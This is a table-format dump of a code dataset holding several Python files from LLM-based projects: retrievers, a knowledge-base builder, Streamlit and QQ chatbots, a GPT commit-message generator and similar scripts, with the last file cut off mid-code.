date_collected
stringclasses 1
value | repo_name
stringlengths 6
116
| file_name
stringlengths 2
220
| file_contents
stringlengths 13
357k
| prompts
sequence |
---|---|---|---|---|
2024-01-10 | pengwork/langchain | langchain~retrievers~elastic_search_bm25.py | """Wrapper around Elasticsearch vector database."""
from __future__ import annotations
import uuid
from typing import Any, Iterable, List
from langchain.docstore.document import Document
from langchain.schema import BaseRetriever
class ElasticSearchBM25Retriever(BaseRetriever):
"""Wrapper around Elasticsearch using BM25 as a retrieval method.
To connect to an Elasticsearch instance that requires login credentials,
including Elastic Cloud, use the Elasticsearch URL format
https://username:password@es_host:9243. For example, to connect to Elastic
Cloud, create the Elasticsearch URL with the required authentication details and
pass it to the ElasticVectorSearch constructor as the named parameter
elasticsearch_url.
You can obtain your Elastic Cloud URL and login credentials by logging in to the
Elastic Cloud console at https://cloud.elastic.co, selecting your deployment, and
navigating to the "Deployments" page.
To obtain your Elastic Cloud password for the default "elastic" user:
1. Log in to the Elastic Cloud console at https://cloud.elastic.co
2. Go to "Security" > "Users"
3. Locate the "elastic" user and click "Edit"
4. Click "Reset password"
5. Follow the prompts to reset the password
The format for Elastic Cloud URLs is
https://username:password@cluster_id.region_id.gcp.cloud.es.io:9243.
"""
def __init__(self, client: Any, index_name: str):
self.client = client
self.index_name = index_name
@classmethod
def create(
cls, elasticsearch_url: str, index_name: str, k1: float = 2.0, b: float = 0.75
) -> ElasticSearchBM25Retriever:
from elasticsearch import Elasticsearch
# Create an Elasticsearch client instance
es = Elasticsearch(elasticsearch_url)
# Define the index settings and mappings
settings = {
"analysis": {"analyzer": {"default": {"type": "standard"}}},
"similarity": {
"custom_bm25": {
"type": "BM25",
"k1": k1,
"b": b,
}
},
}
mappings = {
"properties": {
"content": {
"type": "text",
"similarity": "custom_bm25", # Use the custom BM25 similarity
}
}
}
# Create the index with the specified settings and mappings
es.indices.create(index=index_name, mappings=mappings, settings=settings)
return cls(es, index_name)
def add_texts(
self,
texts: Iterable[str],
refresh_indices: bool = True,
) -> List[str]:
"""Run more texts through the embeddings and add to the retriver.
Args:
texts: Iterable of strings to add to the retriever.
refresh_indices: bool to refresh ElasticSearch indices
Returns:
List of ids from adding the texts into the retriever.
"""
try:
from elasticsearch.helpers import bulk
except ImportError:
raise ValueError(
"Could not import elasticsearch python package. "
"Please install it with `pip install elasticsearch`."
)
requests = []
ids = []
for i, text in enumerate(texts):
_id = str(uuid.uuid4())
request = {
"_op_type": "index",
"_index": self.index_name,
"content": text,
"_id": _id,
}
ids.append(_id)
requests.append(request)
bulk(self.client, requests)
if refresh_indices:
self.client.indices.refresh(index=self.index_name)
return ids
def get_relevant_documents(self, query: str) -> List[Document]:
query_dict = {"query": {"match": {"content": query}}}
res = self.client.search(index=self.index_name, body=query_dict)
docs = []
for r in res["hits"]["hits"]:
docs.append(Document(page_content=r["_source"]["content"]))
return docs
async def aget_relevant_documents(self, query: str) -> List[Document]:
raise NotImplementedError
| [
"{'type': 'text', 'similarity': 'custom_bm25'}"
] |
2024-01-10 | Aznoryusof/candidate_chatai | database~create_db_from_docs.py | import os
import sys
from langchain.document_loaders import DirectoryLoader
from langchain.vectorstores import Chroma
from langchain.embeddings import HuggingFaceInstructEmbeddings
from langchain.text_splitter import RecursiveCharacterTextSplitter
from dotenv import load_dotenv
load_dotenv()
MAIN_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(MAIN_DIR)
DB_PATH = os.environ.get('DB_PATH')
DOCS_PATH = os.environ.get('DOCS_PATH')
EMBEDDINGS_PATH = os.environ.get('EMBEDDINGS_PATH')
EMBEDDINGS_MODEL = os.environ.get('EMBEDDINGS_MODEL')
CHUNK_SIZE = int(os.environ.get('CHUNK_SIZE'))
CHUNK_OVERLAP = int(os.environ.get('CHUNK_OVERLAP'))
def setup_knowledge_base(docs_dir, db_path, embeddings_model):
loader = DirectoryLoader(docs_dir, glob="**/*.txt")
docs = loader.load()
embeddings = HuggingFaceInstructEmbeddings(
model_name=embeddings_model,
cache_folder=EMBEDDINGS_PATH
)
text_splitter = RecursiveCharacterTextSplitter(chunk_size=CHUNK_SIZE, chunk_overlap=CHUNK_OVERLAP)
texts = text_splitter.split_documents(docs)
_ = Chroma.from_documents(texts, embeddings, persist_directory=db_path)
if __name__ == "__main__":
setup_knowledge_base(
os.path.join(MAIN_DIR, DOCS_PATH),
os.path.join(MAIN_DIR, DB_PATH),
EMBEDDINGS_MODEL
) | [] |
2024-01-10 | Aznoryusof/candidate_chatai | app_streamlit~streamlit.py | import os
import sys
MAIN_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(MAIN_DIR)
import streamlit as st
from dotenv import load_dotenv
from langchain.embeddings import HuggingFaceInstructEmbeddings
from langchain.callbacks.base import BaseCallbackHandler
from langchain.callbacks import FileCallbackHandler
from app_streamlit.retrieve import build_chain, run_chain
from loguru import logger
load_dotenv()
EMBEDDINGS_MODEL = os.environ.get('EMBEDDINGS_MODEL')
EMBEDDINGS_PATH = os.environ.get('EMBEDDINGS_PATH')
MAX_HISTORY_LENGTH = int(os.environ.get('MAX_HISTORY_LENGTH'))
REPHRASED_TOKEN = os.environ.get('REPHRASED_TOKEN') # This helps streamlit to ignore the response from the API used to rephrase the question based on history
LOG_FILE_PATH = os.path.join(MAIN_DIR, os.environ.get('LOG_FILE_PATH'))
logger.add(LOG_FILE_PATH, colorize=True, enqueue=True)
log_handler = FileCallbackHandler(LOG_FILE_PATH)
st.set_page_config(page_title="AIAssistant-Aznor", page_icon="🧑💼")
class StreamHandler(BaseCallbackHandler):
def __init__(self, container, initial_text="", rephrased_token=REPHRASED_TOKEN):
self.container=container
self.text=initial_text
self.is_rephrased=None
self.rephrased_token=REPHRASED_TOKEN
def on_llm_new_token(self, token, **kwargs):
if self.rephrased_token not in token:
self.text+=token
self.container.markdown(self.text + "▌")
def render_app():
custom_css = """
<style>
.stTextArea textarea {font-size: 13px;}
div[data-baseweb="select"] > div {font-size: 13px !important;}
</style>
<style>
button {
height: 30px !important;
width: 150px !important;
padding-top: 10px !important;
padding-bottom: 10px !important;
}
</style>
"""
st.markdown(custom_css, unsafe_allow_html=True)
hide_streamlit_style = """
<style>
#MainMenu {visibility: hidden;}
footer {visibility: hidden;}
</style>
"""
st.markdown(hide_streamlit_style, unsafe_allow_html=True)
st.subheader("Hello, I am an AI Assistant. \n\n I am here to share more about Aznor and how he can be an asset to your organization. \n\n Ask me anything in the chat box below.")
if "chat_dialogue" not in st.session_state:
st.session_state["chat_dialogue"] = []
if "chat_dialogue_display" not in st.session_state:
st.session_state["chat_dialogue_display"] = []
def clear_history():
st.session_state["chat_dialogue"] = []
def clear_history_all():
st.session_state["chat_dialogue"] = []
st.session_state["chat_dialogue_display"] = []
embedding_function = HuggingFaceInstructEmbeddings(
model_name=EMBEDDINGS_MODEL,
cache_folder=EMBEDDINGS_PATH
)
# Display chat messages from history on app rerun
for message in st.session_state.chat_dialogue_display:
with st.chat_message(message["role"]):
st.markdown(message["content"])
if len(st.session_state.chat_dialogue) >= MAX_HISTORY_LENGTH:
clear_history()
if prompt := st.chat_input("Type your questions here..."):
# Display user message in chat message container
with st.chat_message("user"):
st.markdown(prompt)
# Display message from LLM
with st.chat_message("assistant"):
answer_placeholder = st.empty()
stream_handler = StreamHandler(answer_placeholder)
chain = build_chain(embedding_function, [stream_handler, log_handler])
try:
output = run_chain(chain, prompt, st.session_state.chat_dialogue)
answer = output["answer"]
logger.info(output)
except Exception:
output = {}
answer = "I am sorry I am unable to respond to your question."
logger.info(output)
answer_placeholder.markdown(answer + "▌")
if 'source_documents' in output:
with st.expander("Documents Referenced"):
for _sd in output.get('source_documents'):
_sd_metadata = _sd.metadata
source = _sd_metadata.get("source")
st.text(f"Location: {source}")
# Add user message to chat history and display
st.session_state.chat_dialogue.append({"role": "user", "content": prompt})
st.session_state.chat_dialogue_display.append({"role": "user", "content": prompt})
# Add assistant response to chat history and display
st.session_state.chat_dialogue.append({"role": "assistant", "content": answer})
st.session_state.chat_dialogue_display.append({"role": "assistant", "content": answer})
col1, col2 = st.columns([10, 4])
with col1:
pass
with col2:
st.button("Clear History", use_container_width=True, on_click=clear_history_all)
render_app()
| [
"I am sorry I am unable to respond to your question."
] |
2024-01-10 | quisitive-spatel/ShiseidoCB | code~utilities~customprompt.py | # flake8: noqa
from langchain.prompts import PromptTemplate
template = """{summaries}
Please reply to the question using only the information present in the text above.
Include references to the sources you used to create the answer if those are relevant ("SOURCES").
If you can't find it, reply politely that the information is not in the knowledge base.
Question: {question}
Answer:"""
PROMPT = PromptTemplate(template=template, input_variables=["summaries", "question"])
EXAMPLE_PROMPT = PromptTemplate(
template="Content: {page_content}\nSource: {source}",
input_variables=["page_content", "source"],
)
| [
"question",
"{summaries}\nPlease reply to the question using only the information present in the text above. \nInclude references to the sources you used to create the answer if those are relevant (\"SOURCES\"). \nIf you can't find it, reply politely that the information is not in the knowledge base.\nQuestion: {question}\nAnswer:",
"Content: {page_content}\nSource: {source}",
"page_content"
] |
2024-01-10 | quisitive-spatel/ShiseidoCB | code~utilities~helper.py | import os
import openai
from dotenv import load_dotenv
import logging
import re
import hashlib
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.llms import AzureOpenAI
from langchain.vectorstores.base import VectorStore
from langchain.chains import ChatVectorDBChain
from langchain.chains import ConversationalRetrievalChain
from langchain.chains.qa_with_sources import load_qa_with_sources_chain
from langchain.chains.llm import LLMChain
from langchain.chains.chat_vector_db.prompts import CONDENSE_QUESTION_PROMPT
from langchain.prompts import PromptTemplate
from langchain.document_loaders.base import BaseLoader
from langchain.document_loaders import WebBaseLoader
from langchain.text_splitter import TokenTextSplitter, TextSplitter
from langchain.document_loaders.base import BaseLoader
from langchain.document_loaders import TextLoader
from langchain.chat_models import ChatOpenAI
from langchain.schema import AIMessage, HumanMessage, SystemMessage
from utilities.formrecognizer import AzureFormRecognizerClient
from utilities.azureblobstorage import AzureBlobStorageClient
from utilities.translator import AzureTranslatorClient
from utilities.customprompt import PROMPT
from utilities.redis import RedisExtended
import pandas as pd
import urllib
from fake_useragent import UserAgent
class LLMHelper:
def __init__(self,
document_loaders : BaseLoader = None,
text_splitter: TextSplitter = None,
embeddings: OpenAIEmbeddings = None,
llm: AzureOpenAI = None,
temperature: float = 0.75,
max_tokens: int = 500,
custom_prompt: str = "",
vector_store: VectorStore = None,
k: int = None,
pdf_parser: AzureFormRecognizerClient = None,
blob_client: AzureBlobStorageClient = None,
enable_translation: bool = False,
translator: AzureTranslatorClient = None):
load_dotenv()
openai.api_type = "azure"
openai.api_base = os.getenv('OPENAI_API_BASE')
openai.api_version = "2023-03-15-preview"
openai.api_key = os.getenv("OPENAI_API_KEY")
# Azure OpenAI settings
self.api_base = openai.api_base
self.api_version = openai.api_version
self.index_name: str = "embeddings"
self.model: str = os.getenv('OPENAI_EMBEDDINGS_ENGINE_DOC', "text-embedding-ada-002")
self.deployment_name: str = os.getenv("OPENAI_ENGINE", os.getenv("OPENAI_ENGINES", "text-davinci-003"))
self.deployment_type: str = os.getenv("OPENAI_DEPLOYMENT_TYPE", "Text")
self.temperature: float = float(os.getenv("OPENAI_TEMPERATURE", 0.75)) if temperature is None else temperature
self.max_tokens: int = int(os.getenv("OPENAI_MAX_TOKENS", -1)) if max_tokens is None else max_tokens
self.prompt = PROMPT if custom_prompt == '' else PromptTemplate(template=custom_prompt, input_variables=["summaries", "question"])
# Vector store settings
self.vector_store_address: str = os.getenv('REDIS_ADDRESS', "localhost")
self.vector_store_port: int= int(os.getenv('REDIS_PORT', 6379))
self.vector_store_protocol: str = os.getenv("REDIS_PROTOCOL", "redis://")
self.vector_store_password: str = os.getenv("REDIS_PASSWORD", None)
if self.vector_store_password:
self.vector_store_full_address = f"{self.vector_store_protocol}:{self.vector_store_password}@{self.vector_store_address}:{self.vector_store_port}"
else:
self.vector_store_full_address = f"{self.vector_store_protocol}{self.vector_store_address}:{self.vector_store_port}"
self.chunk_size = int(os.getenv('CHUNK_SIZE', 500))
self.chunk_overlap = int(os.getenv('CHUNK_OVERLAP', 100))
self.document_loaders: BaseLoader = WebBaseLoader if document_loaders is None else document_loaders
self.text_splitter: TextSplitter = TokenTextSplitter(chunk_size=self.chunk_size, chunk_overlap=self.chunk_overlap) if text_splitter is None else text_splitter
self.embeddings: OpenAIEmbeddings = OpenAIEmbeddings(model=self.model, chunk_size=1) if embeddings is None else embeddings
if self.deployment_type == "Chat":
self.llm: ChatOpenAI = ChatOpenAI(model_name=self.deployment_name, engine=self.deployment_name, temperature=self.temperature, max_tokens=self.max_tokens if self.max_tokens != -1 else None) if llm is None else llm
else:
self.llm: AzureOpenAI = AzureOpenAI(deployment_name=self.deployment_name, temperature=self.temperature, max_tokens=self.max_tokens) if llm is None else llm
self.vector_store: RedisExtended = RedisExtended(redis_url=self.vector_store_full_address, index_name=self.index_name, embedding_function=self.embeddings.embed_query) if vector_store is None else vector_store
self.k : int = 3 if k is None else k
self.pdf_parser : AzureFormRecognizerClient = AzureFormRecognizerClient() if pdf_parser is None else pdf_parser
self.blob_client: AzureBlobStorageClient = AzureBlobStorageClient() if blob_client is None else blob_client
self.enable_translation : bool = False if enable_translation is None else enable_translation
self.translator : AzureTranslatorClient = AzureTranslatorClient() if translator is None else translator
self.user_agent: UserAgent() = UserAgent()
self.user_agent.random
def add_embeddings_lc(self, source_url):
try:
documents = self.document_loaders(source_url).load()
# Convert to UTF-8 encoding for non-ascii text
for(document) in documents:
try:
if document.page_content.encode("iso-8859-1") == document.page_content.encode("latin-1"):
document.page_content = document.page_content.encode("iso-8859-1").decode("utf-8", errors="ignore")
except:
pass
docs = self.text_splitter.split_documents(documents)
# Remove half non-ascii character from start/end of doc content (langchain TokenTextSplitter may split a non-ascii character in half)
pattern = re.compile(r'[\x00-\x1f\x7f\u0080-\u00a0\u2000-\u3000\ufff0-\uffff]')
for(doc) in docs:
doc.page_content = re.sub(pattern, '', doc.page_content)
if doc.page_content == '':
docs.remove(doc)
keys = []
for i, doc in enumerate(docs):
# Create a unique key for the document
source_url = source_url.split('?')[0]
filename = "/".join(source_url.split('/')[4:])
hash_key = hashlib.sha1(f"{source_url}_{i}".encode('utf-8')).hexdigest()
hash_key = f"doc:{self.index_name}:{hash_key}"
keys.append(hash_key)
doc.metadata = {"source": f"[{source_url}]({source_url}_SAS_TOKEN_PLACEHOLDER_)" , "chunk": i, "key": hash_key, "filename": filename}
self.vector_store.add_documents(documents=docs, redis_url=self.vector_store_full_address, index_name=self.index_name, keys=keys)
except Exception as e:
logging.error(f"Error adding embeddings for {source_url}: {e}")
raise e
def convert_file_and_add_embeddings(self, source_url, filename, enable_translation=False):
# Extract the text from the file
text = self.pdf_parser.analyze_read(source_url)
# Translate if requested
text = list(map(lambda x: self.translator.translate(x), text)) if self.enable_translation else text
# Upload the text to Azure Blob Storage
converted_filename = f"converted/{filename}.txt"
source_url = self.blob_client.upload_file("\n".join(text), f"converted/{filename}.txt", content_type='text/plain; charset=utf-8')
print(f"Converted file uploaded to {source_url} with filename {filename}")
# Update the metadata to indicate that the file has been converted
self.blob_client.upsert_blob_metadata(filename, {"converted": "true"})
self.add_embeddings_lc(source_url=source_url)
return converted_filename
def get_all_documents(self, k: int = None):
result = self.vector_store.similarity_search(query="*", k= k if k else self.k)
return pd.DataFrame(list(map(lambda x: {
'key': x.metadata['key'],
'filename': x.metadata['filename'],
'source': urllib.parse.unquote(x.metadata['source']),
'content': x.page_content,
'metadata' : x.metadata,
}, result)))
def get_semantic_answer_lang_chain(self, question, chat_history):
question_generator = LLMChain(llm=self.llm, prompt=CONDENSE_QUESTION_PROMPT, verbose=False)
doc_chain = load_qa_with_sources_chain(self.llm, chain_type="stuff", verbose=True, prompt=self.prompt)
chain = ConversationalRetrievalChain(
retriever=self.vector_store.as_retriever(),
question_generator=question_generator,
combine_docs_chain=doc_chain,
return_source_documents=True,
# top_k_docs_for_context= self.k
)
result = chain({"question": question, "chat_history": chat_history})
context = "\n".join(list(map(lambda x: x.page_content, result['source_documents'])))
sources = "\n".join(set(map(lambda x: x.metadata["source"], result['source_documents'])))
container_sas = self.blob_client.get_container_sas()
result['answer'] = result['answer'].split('SOURCES:')[0].split('Sources:')[0].split('SOURCE:')[0].split('Source:')[0]
sources = sources.replace('_SAS_TOKEN_PLACEHOLDER_', container_sas)
return question, result['answer'], context, sources
def get_embeddings_model(self):
OPENAI_EMBEDDINGS_ENGINE_DOC = os.getenv('OPENAI_EMEBDDINGS_ENGINE', os.getenv('OPENAI_EMBEDDINGS_ENGINE_DOC', 'text-embedding-ada-002'))
OPENAI_EMBEDDINGS_ENGINE_QUERY = os.getenv('OPENAI_EMEBDDINGS_ENGINE', os.getenv('OPENAI_EMBEDDINGS_ENGINE_QUERY', 'text-embedding-ada-002'))
return {
"doc": OPENAI_EMBEDDINGS_ENGINE_DOC,
"query": OPENAI_EMBEDDINGS_ENGINE_QUERY
}
def get_completion(self, prompt, **kwargs):
if self.deployment_type == 'Chat':
return self.llm([HumanMessage(content=prompt)]).content
else:
return self.llm(prompt)
| [] |
2024-01-10 | opq-osc/Botoy-RealChatGPTThisTime | bot_RealChatGPT.py | # -*- coding:UTF-8 -*-
####AIFreeChatV1.0####
import openai
from botoy import GroupMsg,Action,S,Botoy
from botoy import decorators as deco
from botoy.collection import MsgTypes
from botoy.decorators import these_msgtypes,from_these_groups
from botoy.contrib import plugin_receiver
import os
import ast
from urllib import parse
openai.api_key = 'XXXXXXXXXXXXXXXXXXXX' #填入你的API_KEY
Name = "XXXX" #你的机器人昵称
@plugin_receiver.group
@deco.ignore_botself
@from_these_groups(XXXXXXXXX) #你的QQ号
@these_msgtypes(MsgTypes.AtMsg)
def main(ctx=GroupMsg):
if Name in ctx.Content.strip():
if Name in ctx.Content.strip():
MsgPre = ast.literal_eval(ctx.Content)
Msg = MsgPre.get('Content')
print(Msg.replace(Name + " ",''))
if Msg.find(Name) == 0:
promptlist = []
if len(Msg.replace(Name + " ",'')) > 2:
with open("Chat.txt","a") as w:
w.write("\nuserprompt:")
w.write(Msg.replace(Name + " ",''))
w.close()
with open("Chat.txt","r") as f:
for line in f.readlines():
line = line.strip('\n')
if 'systemprompt' in line:
promptdic = {}
promptdic.update({"role":"system"})
promptdic.update({"content":line.replace("systemprompt:","")})
print(promptdic)
promptlist.append(promptdic)
print("1")
if 'userprompt' in line:
promptdic = {}
promptdic.update({"role":"user"})
promptdic.update({"content":line.replace(Name + " ",'').replace("userprompt:","")})
promptlist.append(promptdic)
print("2")
if 'assistantprompt' in line:
promptdic = {}
promptdic.update({"role":"assistant"})
promptdic.update({"content":line.replace("assistantprompt:","")})
promptlist.append(promptdic)
print("3")
f.close()
print(promptlist)
try:
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=promptlist,
temperature=0.7,
max_tokens=800
)
print(response)
AnswerPre = response.get('choices')[0].get('message').get('content').replace('\\x', '%').encode('utf-8').decode('utf-8')
Answer = parse.unquote(AnswerPre)
S.bind(ctx).text(Answer,True)
with open("Chat.txt","a") as a:
a.write("\nassistantprompt:")
a.write(Answer.replace("\n",""))
a.close()
except openai.error.APIConnectionError:
S.bind(ctx).text("网络丢包,请重试",'utf-8')
except openai.error.InvalidRequestError:
S.bind(ctx).text("对话缓存已满,已自动清理,请重试",'utf-8')
os.system("python3 replace_onetime.py")
else:
S.bind(ctx).text("已禁止简单问题",'utf-8')
Action(ctx.CurrentQQ).shutUserUp(
groupID=ctx.FromGroupId,
userid=ctx.FromUserId,
ShutTime=2
)
bot = Botoy(
qq = XXXXXXXX, #你的QQ机器人号码
#use_plugins = True
)
if __name__ == "__main__":
bot.run()
| [
"systemprompt:",
"{}",
"assistantprompt:",
"userprompt:",
" ",
"[]"
] |
2024-01-10 | johntiger1/gpt-cli | CommitMessageGPT.py | import openai
import os
import subprocess
import git
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
PRODUCT_NAME = "Commit Message Generator, powered using GPT"
PRODUCT_NAME_SHORT_FORM = "CMG-GPT"
DRY_RUN = True
DIFF_CACHED_MODE = True
if DIFF_CACHED_MODE:
CACHED_ARG = "--cached"
else:
CACHED_ARG = ""
print(f'Welcome to {PRODUCT_NAME}. Running with {CACHED_ARG} .'
f'Generating your automated git message...')
# Set up Git repository path and branch name
repo_path = os.getcwd()
repo_path = '/Users/johnchen/src/offergenmodels'
# Connect to the Git repository
repo = git.Repo(repo_path)
if CACHED_ARG:
diff_output = subprocess.check_output(["git", "diff", CACHED_ARG, "--no-color"], cwd=repo_path).decode("utf-8")
else:
diff_output = subprocess.check_output(["git", "diff", "--no-color"], cwd=repo_path).decode("utf-8")
if diff_output == '':
print('no git diff output detected; nothing to commit')
exit(0)
modified_files = [item.a_path for item in repo.index.diff(None) if item.change_type != 'D']
# print(diff_output)
total_payload = f'''{diff_output}'''
example_git_messages = '''
git commit -m "Fix typo in header of README.md"
git commit -m "Add new feature to user profile page"
git commit -m "Refactor file handling logic for improved performance"
git commit -m "Update dependencies to fix security vulnerability"
git commit -m "Remove unused code and files"
git commit -m "Improve error handling for invalid input"
'''
summary = openai.Completion.create(
engine="text-davinci-003",
prompt=f"Create a `git commit` message based on the git diff output. "
# f"If there are no changes to the files, then please specify 'no changes detected'."
# f"Prepend `generated with {PRODUCT_NAME_SHORT_FORM}` to the "
# f"start of your git commit message. "
f"Here is the git diff:"
f"{total_payload}"
f" ",
max_tokens=60,
n=1,
stop=None,
temperature=0.2,
presence_penalty=-1
)["choices"][0]["text"].strip()
index = repo.index
for file in modified_files:
index.add([file])
if not DRY_RUN:
index.commit(summary)
print(f"git commit -m {summary}") | [
"Create a `git commit` message based on the git diff output. "
] |
2024-01-10 | johntiger1/gpt-cli | async_gpt.py | import openai
import os
import time
import queue
import threading
import keyboard
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
# Set up the GPT-3 model
model_engine = "gpt-3.5-turbo"
SKIP_PROMPT = "I have nothing to say right now."
history = [
{"role": "system", "content": "You are assistantGPT. You are a helpful assistant, who also has the ability to "
"query the user every 10s for any input that you believe "
"may further assist them. If the previous message included the phrase "
"'I have nothing to say right now', then generate the empty response ( ). "
"}"},
]
# Create a message queue to handle user input
message_queue = queue.Queue()
# Define a function to generate a response
def generate_response(prompt):
global history
if prompt == SKIP_PROMPT:
prompt = "I am still thinking of what to ask. Please ask me a clarifying question."
new_message = {"role": "user", "content": "Please me a great, asynchronous assistant with my daily life. "
"Some common things to ask me are: - have i responded to all my work emails yet?"
"- have I followed up with Jim from accounting on getting those invoices done?"
"- is it anyone's birthday yet? If there is nothing relevant right now, it is always"
"ok to ask me how my day is going and where my head space is."
"\n However, please make it relevant to the conversation we are having."
+ prompt
}
history.append(new_message)
completion = openai.ChatCompletion.create(
model=model_engine,
messages=history
)
# Command to execute the command
system_output_response = completion.choices[0].message.content
output_dict = {"role":"assistant", "content":f"{system_output_response}"}
history.append(output_dict)
history.extend(history[:2])
return system_output_response
def execute_response(response):
'''in the future, we can do zero-shot toxicity detection '''
print(response)
def handle_user_input():
while True:
user_input = input("You: ")
if user_input.lower() == "exit":
exit(0)
message_queue.put(user_input)
def handle_message_queue():
last_user_input_time = 0
while True:
if message_queue.qsize() > 0:
user_input = message_queue.get()
prompt = user_input
last_user_input_time = time.time()
elif time.time() - last_user_input_time >= 5 and not any(keyboard.is_pressed(key) for key in keyboard.all_modifiers):
prompt = SKIP_PROMPT
last_user_input_time = time.time()
print("USER_PROMPT SKIPPED")
else:
time.sleep(1)
continue
response = str(generate_response(prompt))
execute_response(response)
if __name__ == "__main__":
print('Welcome to asyncGPT. Type "exit" to quit at any time')
user_input = input("You: ")
prompt = "\nUser: " + user_input
response = str(generate_response(prompt))
execute_response(response)
# Create and start threads to handle user input and message queue
user_input_thread = threading.Thread(target=handle_user_input)
message_queue_thread = threading.Thread(target=handle_message_queue)
user_input_thread.start()
message_queue_thread.start()
# Wait for threads to finish
user_input_thread.join()
message_queue_thread.join()
| [
"I have nothing to say right now.",
"PLACEHOLDER",
"You are assistantGPT. You are a helpful assistant, who also has the ability to query the user every 10s for any input that you believe may further assist them. If the previous message included the phrase 'I have nothing to say right now', then generate the empty response ( ). }",
"I am still thinking of what to ask. Please ask me a clarifying question.",
"Please me a great, asynchronous assistant with my daily life. Some common things to ask me are: - have i responded to all my work emails yet?- have I followed up with Jim from accounting on getting those invoices done?- is it anyone's birthday yet? If there is nothing relevant right now, it is alwaysok to ask me how my day is going and where my head space is.\n However, please make it relevant to the conversation we are having.PLACEHOLDER",
"\nUser: PLACEHOLDER"
] |
2024-01-10 | johntiger1/gpt-cli | updateDirectory.py | import os
import json
import mimetypes
import openai
import requests
import regex
def get_file_contents(filepath):
mimetype, encoding = mimetypes.guess_type(filepath)
if encoding is None:
encoding = 'utf-8'
with open(filepath, 'r', encoding=encoding) as f:
try:
return f.read()
except UnicodeDecodeError:
return None
def get_dir_contents(dirpath):
dir_contents = {}
for name in os.listdir(dirpath):
path = os.path.join(dirpath, name)
if os.path.isfile(path):
contents = get_file_contents(path)
if contents is not None:
dir_contents[name] = contents
elif os.path.isdir(path):
sub_dir_contents = get_dir_contents(path)
if sub_dir_contents:
dir_contents[name] = sub_dir_contents
return dir_contents
def dir_to_json(dirpath):
dir_contents = get_dir_contents(dirpath)
return json.dumps(dir_contents, indent=4)
def apply_changes_to_dir(changes, dirpath):
for name, change in changes.items():
path = os.path.join(dirpath, name)
if isinstance(change, dict):
if not os.path.isdir(path):
os.mkdir(path)
apply_changes(change, path)
elif change == "__DELETE__":
if os.path.isfile(path):
os.remove(path)
else:
with open(path, 'w', encoding='utf-8') as f:
f.write(change)
# Prompt for OpenAI GPT-3.5-Turbo API
user_prompt = input("Please enter the prompt: ")
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
# Set up the GPT-3 model
model_engine = "gpt-3.5-turbo"
with open('prompt.txt', 'r') as file:
model_prompt = file.read().replace('\n', '')
gpt_input = [
{"role": "system", "content": model_prompt}
]
# Prompt user to enter directory path
dirpath = input("Please enter the directory path: ")
json_data = dir_to_json(dirpath)
# Call OpenAI GPT-3.5-Turbo API to complete the JSON object
content = "User Prompt: " + user_prompt + "\n" + "JSON object representing directory and file content: " + "\n" + json_data
CONTENT_DICT = {"role": "user", "content": content}
gpt_input.append(CONTENT_DICT)
completion = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=gpt_input
)
system_output_response = completion.choices[0].message.content
pattern = regex.compile(r'\{(?:[^{}]|(?R))*\}')
json_string = pattern.findall(system_output_response)[0]
json_dict = json.loads(json_string)
print(json_dict)
# apply_changes_to_dir(dirpath, json_dict) | [
"Please enter the prompt: ",
"\n",
"User Prompt: PLACEHOLDER\nJSON object representing directory and file content: \nPLACEHOLDER"
] |
2024-01-10 | johntiger1/gpt-cli | imagegpt.py | import openai
import os
import re
# Set up OpenAI API credentials
openai.api_key = os.environ["OPENAI_API_KEY"]
# Set up the GPT-3 model
model_engine = "gpt-3.5-turbo"
prompt = "Hello, how can I assist you today?"
# Define a function to generate a response
def generate_response(prompt):
response = openai.ChatCompletion.create(
engine=model_engine,
prompt=prompt,
max_tokens=1024,
n=1,
stop=None,
temperature=0.5,
)
message = response.choices[0].text.strip()
return message
def generate_respone_v2(prompt):
import os
import openai
openai.api_key = os.getenv("OPENAI_API_KEY")
pattern = "___code____"
completion = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=[
{"role": "system", "content": "You are codeGPT. You return runnable code only. Produce"
"an error message if appropriate.}"},
{"role": "user", "content": f"Produce ONLY executable code for the following prompt. Do not include any explanation or natural language"
# f"Give me a runnable python program for the following question. "
# f""
# f"Surround ONLY the "
# f"executable code block with {pattern} before and after; i.e. make sure that what is surrounded "
# f"by {pattern} is executable: "
+ prompt}
# {"role": "user", content: "" }
]
)
re_pattern = fr"{pattern}\s*(.*?)\s*{pattern}"
match = re.search(re_pattern, str(completion.choices[0].message), re.DOTALL)
# Code to extract the command
if match:
code = match.group(1)
print('code extracted')
print("")
print("this is the extracted code",code.strip())
# You: write me an endpoint for a flask POST request that accepts image upload, with a ratelimiter
# Sanitization layer
# Command to execute the command
print(str(completion.choices[0].message.content))
# return completion.choices[0].message
def generate_response_image(prompt):
import time
start_time = time.time()
print('starting API call')
response = openai.Image.create_edit(
image=open("14.png", "rb"),
mask=open("square_mask.png", "rb"),
prompt=f"Make the area red",
n=5,
size="256x256"
)
with open(f"{prompt}.txt", "w") as file:
for item in response['data']:
file.write(str(item['url']) + "\n")
end_time = time.time()
elapsed_time = end_time - start_time
print(f"Elapsed time: {elapsed_time} seconds")
print("image mode selected")
# Get input from the user and generate a response
while True:
user_input = input("You: ")
if user_input.lower() == "exit":
break
prompt = "\nUser: " + user_input
response = generate_response_image(prompt)
print('finished command')
# print("ChatGPT: " + response)
| [
"Produce ONLY executable code for the following prompt. Do not include any explanation or natural language",
"\nUser: PLACEHOLDER",
"You are codeGPT. You return runnable code only. Producean error message if appropriate.}",
"Hello, how can I assist you today?"
] |
2024-01-10 | 7uk3y/aiserchdemo | stindex3.py | import os, streamlit as st
from PIL import Image
# Uncomment to specify your OpenAI API key here (local testing only, not in production!), or add corresponding environment variable (recommended)
# os.environ['OPENAI_API_KEY']= ""
from llama_index import VectorStoreIndex, SimpleDirectoryReader, LLMPredictor, PromptHelper, ServiceContext
from langchain.llms.openai import OpenAI
from llama_index import StorageContext, load_index_from_storage
image = Image.open('logo.png')
# Define a simple Streamlit app
st.image(image, width=100)
query = st.text_input("What would you like to ask? (source: data/)")
# If the 'Submit' button is clicked
if st.button("Submit"):
if not query.strip():
st.error(f"Please provide the search query.")
else:
try:
